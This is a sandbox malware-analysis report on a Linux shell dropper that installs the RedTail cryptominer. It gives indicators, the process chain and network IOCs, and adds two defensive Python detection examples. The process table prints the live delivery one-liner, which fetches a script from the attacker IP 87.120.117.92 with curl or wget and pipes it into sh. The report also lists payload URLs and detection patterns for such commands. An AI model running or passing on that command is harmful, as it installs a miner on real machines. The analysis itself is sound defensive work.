Sample (download): /sh

Full analysis: https://app.any.run/tasks/6203ccd6-0377-4f65-bad5-7bb85bad8fe1
Verdict: Malicious activity
Threats:

Crypto mining malware is a resource-intensive threat that infiltrates computers in order to mine cryptocurrency. It can be deployed either on an infected machine or on a compromised website; in both cases the miner consumes the device's computing power and its network bandwidth.

Analysis date: October 21, 2024, 15:52:33
OS: Ubuntu 22.04.2
Tags: miner
Indicators:
MIME: text/x-shellscript
File info: Bourne-Again shell script, ASCII text executable
MD5: DAFA22699DB6C9B0DFEB8B1962B82467
SHA1: C504D770D1FF787D0B38CEED59C8947D1D122647
SHA256: D5B55117F713A1A265DCAB0DC68CEB4A607069F3831BD2594AA1330D5D0EAC81
SSDEEP: 24:Iz2zSlLNpuAltrM35BFRDD6n0LY83H0tfhhp5wEliodZYDYc7QW:IyOlL9tonmzfvJlBZY6W

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Connects to the CnC server
      • .redtail (PID: 14060)
    • MINER has been detected (SURICATA)
      • .redtail (PID: 14060)
  • SUSPICIOUS
    • Reads /proc/mounts (likely used to find writable filesystems)
      • check-new-release-gtk (PID: 13966)
      • cat (PID: 13944)
      • .redtail (PID: 14059)
    • Executes the "rm" command to delete files or directories
      • sh (PID: 13942)
      • sh (PID: 13998)
    • Uses wget to download content
      • sh (PID: 13942)
    • Executes commands using command-line interpreter
      • update-notifier (PID: 13964)
      • sh (PID: 13911)
      • sh (PID: 13942)
      • .redtail (PID: 14060)
    • Potential Corporate Privacy Violation
      • wget (PID: 14056)
      • .redtail (PID: 14060)
    • Checks DMI information (probably VM detection)
      • .redtail (PID: 14059)
      • udevadm (PID: 14076)
    • Connects to the server without a host name
      • wget (PID: 14056)
      • wget (PID: 13990)
    • Modifies Cron jobs
      • sh (PID: 14062)
    • Crypto Currency Mining Activity Detected
      • .redtail (PID: 14060)
    • Removes file immutable attribute
      • sh (PID: 13998)
    • Manipulating modules (likely to execute programs on system boot)
      • modprobe (PID: 14075)
    • Connects to unusual port
      • .redtail (PID: 14060)
  • INFO
    • No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD: .sh | Linux/UNIX shell script (100)

Screenshots: available in the full report.

Total processes: 334
Monitored processes: 115
Malicious processes: 4
Suspicious processes: 0

Behavior graph

Process chain as rendered by the report, in order. Names marked with * carry indicators; every other entry is listed by the report as "no specs" (no indicators):

start, sh, dash, snap, snap-seccomp, snap-confine, snap-confine, dash, sh, dash, cat, grep, awk, dash, whoami, find, systemctl, systemctl, systemctl, systemctl, update-notifier, sh, check-new-release-gtk*, dpkg, dpkg, lsb_release, lsb_release, lsb_release, lsb_release, uname, touch, dash, dd, rm, wget*, chmod, tracker-extract-3, sh, systemctl, systemctl, chattr, chattr, grep, mv, chattr, chattr, chattr, grep, mv, chattr, grep, mv, chattr, grep, mv, chattr, grep, mv, chattr, grep, mv, chattr, grep, mv, chattr, grep, mv, chattr, chattr, grep, mv, chattr, grep, mv, chattr, chattr, grep, mv, chattr, chattr, grep, mv, chattr, grep, mv, chattr, grep, mv, rm, rm, rm, rm, rm, dash, grep, wget*, mv, chmod, .redtail, .redtail* (#MINER), sh, sh, crontab, dash, crontab, sh, sh, sh, which, sh, which, .redtail, sh, iptables, modprobe, udevadm

The repeated chattr / grep / mv runs are the dropper clearing the immutable attribute on existing files and replacing them before the second wget fetches the miner binary and chmod makes it executable.

Process information

PID   | CMD | Path | Parent process | User | Integrity level | Exit code
13911 | /bin/sh -c "X=\$(curl http://87\.120\.117\.92/sh || wget http://87\.120\.117\.92/sh -O-); echo \"\$X\" | sh -s apache\.selfrep " | /bin/sh | any-guest-agent | user | UNKNOWN | 13949
13912 | /bin/sh -c "X=\$(curl http://87\.120\.117\.92/sh || wget http://87\.120\.117\.92/sh -O-); echo \"\$X\" | sh -s apache\.selfrep " | /usr/bin/dash | sh | user | UNKNOWN | 0
13913 | curl http://87.120.117.92/sh | /snap/snapd/current/usr/bin/snap | dash | user | UNKNOWN | 0
13926 | /snap/snapd/20290/usr/lib/snapd/snap-seccomp version-info | /snap/snapd/20290/usr/lib/snapd/snap-seccomp | snap | user | UNKNOWN | 0
13934 | /snap/snapd/20290/usr/lib/snapd/snap-confine --base core20 snap.curl.curl /usr/lib/snapd/snap-exec curl http://87.120.117.92/sh | /snap/snapd/20290/usr/lib/snapd/snap-confine | (not shown) | user | UNKNOWN | 0
13935 | /snap/snapd/20290/usr/lib/snapd/snap-confine --base core20 snap.curl.curl /usr/lib/snapd/snap-exec curl http://87.120.117.92/sh | /snap/snapd/20290/usr/lib/snapd/snap-confine | (not shown) | user | UNKNOWN | 0
13941 | /bin/sh -c "X=\$(curl http://87\.120\.117\.92/sh || wget http://87\.120\.117\.92/sh -O-); echo \"\$X\" | sh -s apache\.selfrep " | /usr/bin/dash | sh | user | UNKNOWN | 0
13942 | sh -s apache.selfrep | /usr/bin/sh | sh | user | UNKNOWN | 13949
13943 | sh -s apache.selfrep | /usr/bin/dash | sh | user | UNKNOWN | 0
13944 | cat /proc/mounts | /usr/bin/cat | dash | user | UNKNOWN | 0

The backslashes in the -c strings are the report's rendering of the argv string; the child curl (PID 13913) received the plain URL http://87.120.117.92/sh. On this guest, curl is the snap build, which is why snap-confine and snap-seccomp appear between dash and the actual fetch. The script is never written to disk: it is captured into $X and piped into "sh -s apache.selfrep", so sh reads it from stdin and "apache.selfrep" becomes the script's $1. Exit code 13949 for PIDs 13911 and 13942 is reproduced as the report shows it.
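The one-liner in PID 13911 is the entire delivery mechanism, and its shape (curl-or-wget, bare IP, output piped straight into sh -s with an argument) is what a hunter would want to pull out of EDR or sandbox command-line telemetry. The following is an added example written for this page, not code from the ANY.RUN report or from the sample: it takes the command line exactly as the report renders it (including the backslash escapes) and returns the indicators to pivot on. The two CONSTRUCTED_* lines are made up to show the general pattern and a benign fetch; everything else is from the report.

```python
"""Added example, not part of the ANY.RUN report: extract hunting indicators
from a download-and-pipe-to-shell one-liner like the one in PID 13911.
The input is the command line as the report renders it (with the backslash
escapes the report adds); the output is what a responder can pivot on:
URLs, bare IPs, the fetch tool, and the positional argument handed to sh."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Copied from the report's process table (PID 13911), escapes included.
REPORT_CMDLINE = (
    r'/bin/sh -c "X=\$(curl http://87\.120\.117\.92/sh || '
    r'wget http://87\.120\.117\.92/sh -O-); echo \"\$X\" | sh -s apache\.selfrep "'
)
# Constructed samples (NOT from the report) to show the general case.
CONSTRUCTED_PIPE = "curl -fsSL http://installer.example/x.sh | bash"
CONSTRUCTED_BENIGN = "wget https://archive.ubuntu.com/pool/foo.tar.gz -O /tmp/foo.tar.gz"

URL_RE = re.compile(r"""(?:https?|ftp)://[^\s"'|;)]+""")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SHELL = r"(?:/bin/|/usr/bin/)?(?:sh|bash|dash|ash)\b"
PIPE_TO_SHELL_RE = re.compile(r"\|\s*" + SHELL)
# "sh -s ARG": sh reads the script from stdin and ARG becomes its $1
# (the report shows "apache.selfrep" in that position).
SCRIPT_ARG_RE = re.compile(r"\|\s*" + SHELL + r"\s+-s\s+(\S+)")
FETCHERS = ("curl", "wget")


def unescape_display(cmd: str) -> str:
    """Undo the backslash escaping the report applies when rendering argv."""
    return re.sub(r"\\(.)", r"\1", cmd)


@dataclass
class DropperIOCs:
    urls: List[str] = field(default_factory=list)
    ips: List[str] = field(default_factory=list)
    fetchers: List[str] = field(default_factory=list)
    pipes_to_shell: bool = False          # downloaded bytes go straight into an interpreter
    script_arg: Optional[str] = None      # $1 passed via "sh -s ARG"
    bare_ip_hosts_only: bool = False      # no hostname at all, so no DNS query to catch


def extract(cmdline: str) -> DropperIOCs:
    cmd = unescape_display(cmdline)
    ioc = DropperIOCs()
    ioc.urls = sorted(set(URL_RE.findall(cmd)))
    ioc.ips = sorted(set(IPV4_RE.findall(cmd)))
    ioc.fetchers = [f for f in FETCHERS if re.search(rf"\b{f}\b", cmd)]
    # Nothing touches disk first: the fetched script is executed from a pipe.
    ioc.pipes_to_shell = bool(ioc.fetchers) and PIPE_TO_SHELL_RE.search(cmd) is not None
    m = SCRIPT_ARG_RE.search(cmd)
    ioc.script_arg = m.group(1) if m else None
    # Every URL host is a literal IPv4 address: DNS-layer controls see nothing.
    hosts = [re.sub(r"^\w+://", "", u).split("/")[0].split(":")[0] for u in ioc.urls]
    ioc.bare_ip_hosts_only = bool(hosts) and all(IPV4_RE.fullmatch(h) for h in hosts)
    return ioc


if __name__ == "__main__":
    for line in (REPORT_CMDLINE, CONSTRUCTED_PIPE, CONSTRUCTED_BENIGN):
        print(extract(line))
```

Run against the report's command line the extractor returns the single URL http://87.120.117.92/sh, the IP 87.120.117.92, both fetch tools (the script falls back from curl to wget), pipes_to_shell set, and apache.selfrep as the script argument; the benign constructed wget line returns a URL but no pipe-to-shell flag.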
Executable files: 0
Suspicious files: 1
Text files: 10
Unknown types: 0

Dropped files

PID   | Process               | Filename                                                | Type
13966 | check-new-release-gtk | /tmp/#6029334 (deleted)                                 | text
13966 | check-new-release-gtk | /tmp/#6029335 (deleted)                                 | text
13966 | check-new-release-gtk | /tmp/#6029359 (deleted)                                 | text
13966 | check-new-release-gtk | /tmp/#6029364 (deleted)                                 | text
13966 | check-new-release-gtk | /tmp/#6029378 (deleted)                                 | text
13966 | check-new-release-gtk | /tmp/#6029379 (deleted)                                 | text
13966 | check-new-release-gtk | /tmp/#6029381 (deleted)                                 | text
13966 | check-new-release-gtk | /tmp/#6029987 (deleted)                                 | text
13966 | check-new-release-gtk | /tmp/#6029988 (deleted)                                 | text
13966 | check-new-release-gtk | /home/user/.cache/update-manager-core/meta-release-lts  | text

MD5 and SHA256 values for these files are not included in this extract. All ten are written by check-new-release-gtk (PID 13966), the update-manager helper that update-notifier spawns in the background of the Ubuntu guest; they are guest noise, not files dropped by the sample. The miner binary fetched from http://87.120.117.92/x86_64 (wget PID 14056) is not listed here.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 5
TCP/UDP connections: 33
DNS requests: 18
Threats: 11

HTTP requests

Empty cells were not rendered in the extract; values are listed in the report's column order (PID, Process, Method, HTTP code, IP, URL, CN, Type, Size, Reputation).

PID   | Process        | Method | HTTP code | IP                 | URL                                   | CN      | Type    | Size | Reputation
      |                | GET    | 204       | 185.125.190.48:80  | http://connectivity-check.ubuntu.com/ | unknown |         |      | whitelisted
      |                | GET    | 200       | 87.120.117.92:80   | http://87.120.117.92/sh               | unknown | unknown | 473  |
      | NetworkManager | GET    | 204       | 185.125.190.98:80  | http://connectivity-check.ubuntu.com/ | unknown |         |      | whitelisted
14056 | wget           | GET    | 200       | 87.120.117.92:80   | http://87.120.117.92/x86_64           | unknown |         |      | unknown
13990 | wget           | GET    | 200       | 87.120.117.92:80   | http://87.120.117.92/clean            | unknown |         |      | unknown

Three requests go to the dropper host 87.120.117.92 over plain HTTP: /sh (the script under analysis), /x86_64 (the ELF that Suricata flags in the Threats table and that runs as .redtail), and /clean. The two connectivity-check requests are the guest's own NetworkManager.

Connections

PID   | Process               | IP                  | Domain                        | ASN                     | CN | Reputation
470   | avahi-daemon          | 224.0.0.251:5353    |                               |                         |    | unknown
      |                       | 91.189.91.49:80     | connectivity-check.ubuntu.com | Canonical Group Limited | US | whitelisted
      |                       | 185.125.190.48:80   | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted
      |                       | 212.102.56.178:443  | odrs.gnome.org                | Datacamp Limited        | DE | whitelisted
485   | snapd                 | 185.125.188.54:443  | api.snapcraft.io              | Canonical Group Limited | GB | whitelisted
      |                       | 87.120.117.92:80    |                               | Yuri Jordanov Ltd.      | BG | unknown
485   | snapd                 | 185.125.188.59:443  | api.snapcraft.io              | Canonical Group Limited | GB | whitelisted
13966 | check-new-release-gtk | 91.189.91.48:443    | connectivity-check.ubuntu.com | Canonical Group Limited | US | whitelisted
13990 | wget                  | 87.120.117.92:80    |                               | Yuri Jordanov Ltd.      | BG | unknown
14056 | wget                  | 87.120.117.92:80    |                               | Yuri Jordanov Ltd.      | BG | unknown

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.142
  • 2a00:1450:4001:82a::200e
whitelisted
odrs.gnome.org
  • 212.102.56.178
  • 169.150.255.184
  • 207.211.211.27
  • 169.150.255.180
  • 195.181.170.18
  • 37.19.194.80
  • 195.181.175.41
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::101
whitelisted
api.snapcraft.io
  • 185.125.188.54
  • 185.125.188.55
  • 185.125.188.59
  • 185.125.188.58
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::6d
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::42
whitelisted
connectivity-check.ubuntu.com
  • 2620:2d:4000:1::2a
  • 2001:67c:1562::24
  • 2620:2d:4000:1::2b
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::96
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::23
  • 2620:2d:4002:1::197
  • 2620:2d:4000:1::97
  • 2001:67c:1562::23
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::98
  • 185.125.190.98
  • 185.125.190.18
  • 185.125.190.49
  • 185.125.190.97
  • 91.189.91.96
  • 91.189.91.98
  • 185.125.190.96
  • 91.189.91.49
  • 91.189.91.97
  • 185.125.190.17
  • 91.189.91.48
  • 185.125.190.48
whitelisted
46.100.168.192.in-addr.arpa
unknown
changelogs.ubuntu.com
  • 91.189.91.48
  • 185.125.190.17
  • 91.189.91.49
  • 185.125.190.18
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::2b
whitelisted
moneroed.net
  • 80.94.92.146
  • 94.156.177.109
  • 80.94.92.140
  • 92.118.39.120
  • 80.94.92.136
  • 80.94.92.147
  • 80.94.92.135
  • 80.94.92.149
unknown

Threats

PID   | Process  | Class                                    | Message
      |          | Potentially Bad Traffic                  | ET HUNTING curl User-Agent to Dotted Quad
      |          | Potentially Bad Traffic                  | SUSPICIOUS [ANY.RUN] The user name associated in PS.Script has been detected
14056 | wget     | Potential Corporate Privacy Violation    | ET POLICY Executable and linking format (ELF) file download Over HTTP
14060 | .redtail | Misc Attack                              | ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 326
14060 | .redtail | Misc Attack                              | ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 210
14060 | .redtail | Crypto Currency Mining Activity Detected | MINER [ANY.RUN] CoinMiner Agent CnC Initial Connection
14060 | .redtail | Misc Attack                              | ET DROP Spamhaus DROP Listed Traffic Inbound group 8
14060 | .redtail | Potential Corporate Privacy Violation    | ET POLICY Cryptocurrency Miner Checkin
14060 | .redtail | Misc Attack                              | ET DROP Spamhaus DROP Listed Traffic Inbound group 8
14060 | .redtail | Potential Corporate Privacy Violation    | ET POLICY Cryptocurrency Miner Checkin
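The network signatures above only fire once the miner is already talking to its pool; the host-side indicators earlier in the report (wget from a bare IP, chattr removing the immutable bit, crontab changes, a dot-prefixed binary, modprobe/udevadm calls) are visible before that. What follows is an added example, not code from the ANY.RUN report or from the sample, that scores a process tree for that chain. The EVENTS list is constructed to mirror the report's tree: PIDs, process names and URLs are taken from the report where it shows them, while the command-line arguments, the PIDs of the chattr/chmod/crontab children and the PID attribution of the moneroed.net lookup are assumptions. The watchlist holds only the two destinations this report names, and the four-signal threshold is an assumed starting point.

```python
"""Added example, not part of the ANY.RUN report: score a Linux process tree for
the behaviour chain this report flags (fetch from a bare IP, chattr -i, cron
change, chmod +x of a hidden binary, modprobe/udevadm/iptables, watch-listed
destinations).  EVENTS is CONSTRUCTED to mirror the report's tree: PIDs, names
and URLs come from the report where it shows them; arguments, helper-process
PIDs and the PID on the DNS event are assumed."""
import re
from collections import defaultdict

# Indicators named in this report; a production watchlist would be intel-fed.
WATCHLIST = {"87.120.117.92", "moneroed.net"}
BARE_IP_URL = re.compile(r"\w+://(?:\d{1,3}\.){3}\d{1,3}(?:[:/]|$)")
MIN_SIGNALS = 4  # assumed threshold; tune against your own telemetry


def classify(ev):
    """Return the set of signal names one process or network event triggers."""
    comm, args = ev.get("comm", ""), ev.get("args", [])
    hits = set()
    if comm in ("curl", "wget") and any(BARE_IP_URL.match(a) for a in args):
        hits.add("fetch_from_bare_ip")        # "Connects to the server without a host name"
    if comm == "chattr" and any(re.match(r"-[a-zA-Z]*i", a) for a in args):
        hits.add("immutable_attr_removed")    # "Removes file immutable attribute"
    if comm == "crontab" and "-l" not in args:
        hits.add("cron_modified")             # "Modifies Cron jobs" (crontab -l only reads)
    if comm == "chmod" and any(a.startswith("+") and "x" in a for a in args):
        hits.add("made_executable")
    if comm.startswith("."):
        hits.add("hidden_binary_executed")    # .redtail
    if comm in ("modprobe", "udevadm", "iptables"):
        hits.add(comm + "_invoked")           # module, DMI and firewall activity
    if (ev.get("dst") or ev.get("domain")) in WATCHLIST:
        hits.add("watchlisted_destination")
    return hits


def score_tree(events):
    """Attribute each event to the top-most process in the event set and give
    a per-tree verdict once enough of the chain is present."""
    parent = {e["pid"]: e["ppid"] for e in events if "ppid" in e}

    def root_of(pid):
        while parent.get(pid) in parent:      # climb while the parent is itself an event
            pid = parent[pid]
        return pid

    signals = defaultdict(set)
    for e in events:
        signals[root_of(e["pid"])] |= classify(e)
    return {root: {"signals": sorted(s),
                   "verdict": "miner-dropper-like" if len(s) >= MIN_SIGNALS else "benign"}
            for root, s in signals.items()}


# Constructed telemetry modelled on the report (see module docstring).
EVENTS = [
    {"pid": 13942, "ppid": 13911, "comm": "sh", "args": ["-s", "apache.selfrep"]},
    {"pid": 13990, "ppid": 13942, "comm": "wget", "args": ["http://87.120.117.92/clean", "-O-"]},
    {"pid": 13998, "ppid": 13942, "comm": "sh", "args": []},
    {"pid": 13999, "ppid": 13998, "comm": "chattr", "args": ["-i", "/some/locked/file"]},  # PID, path assumed
    {"pid": 14056, "ppid": 13942, "comm": "wget", "args": ["http://87.120.117.92/x86_64"]},
    {"pid": 14057, "ppid": 13942, "comm": "chmod", "args": ["+x", ".redtail"]},             # PID assumed
    {"pid": 14060, "ppid": 13942, "comm": ".redtail", "args": []},
    {"pid": 14062, "ppid": 14060, "comm": "sh", "args": []},
    {"pid": 14063, "ppid": 14062, "comm": "crontab", "args": ["-"]},                          # PID, args assumed
    {"pid": 14075, "ppid": 14060, "comm": "modprobe", "args": []},
    {"pid": 14076, "ppid": 14060, "comm": "udevadm", "args": ["info"]},                      # args assumed
    {"pid": 14060, "domain": "moneroed.net"},                                                # attribution assumed
    {"pid": 14060, "dst": "87.120.117.92", "port": 80},
    # Benign guest background activity from the same run.
    {"pid": 13964, "ppid": 1, "comm": "update-notifier", "args": []},
    {"pid": 13966, "ppid": 13964, "comm": "check-new-release-gtk", "args": []},
    {"pid": 13967, "ppid": 13966, "comm": "cat", "args": ["/proc/mounts"]},                 # PID assumed
]

if __name__ == "__main__":
    for root, result in score_tree(EVENTS).items():
        print(root, result["verdict"], result["signals"])
```

Attribution to the tree root rather than to the individual process is the point: no single chattr, crontab or chmod call is suspicious on an Ubuntu box, but the dropper's tree rooted at sh (PID 13942) collects all of them, while the update-notifier tree that also reads /proc/mounts collects none.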
1 ETPRO signatures available at the full report
No debug info